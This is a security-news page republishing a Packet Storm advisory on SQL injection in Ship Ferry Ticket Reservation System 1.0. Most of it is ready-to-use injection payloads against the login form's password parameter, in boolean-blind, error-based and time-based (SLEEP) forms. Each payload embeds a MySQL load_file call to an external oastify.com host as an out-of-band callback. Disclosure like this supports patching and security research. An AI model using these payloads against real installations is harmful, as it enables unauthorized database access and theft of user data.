Security
Headlines
HeadlinesLatestCVEs

Headline

Ship Ferry Ticket Reservation System 1.0 SQL Injection

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

Packet Storm
#sql#xss#vulnerability#web#git#php#rce#auth
## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi### Bonus: FU + RCE & XSS - Information disclosure## Author: nu11secur1ty## Date: 09/14/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submittedin the password parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get all theinformation from the database of this system, and he can do very maliciousaction against the owner of this application!STATUS: HIGH- Vulnerability for deprecation!WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!https://github.com/oretnom23[+]Exploits:- SQLi Multiple:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT9033=9033 AND ('ehPW'='ehPW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw---```## Reproduce:[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)## Time spent:00:17:00

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13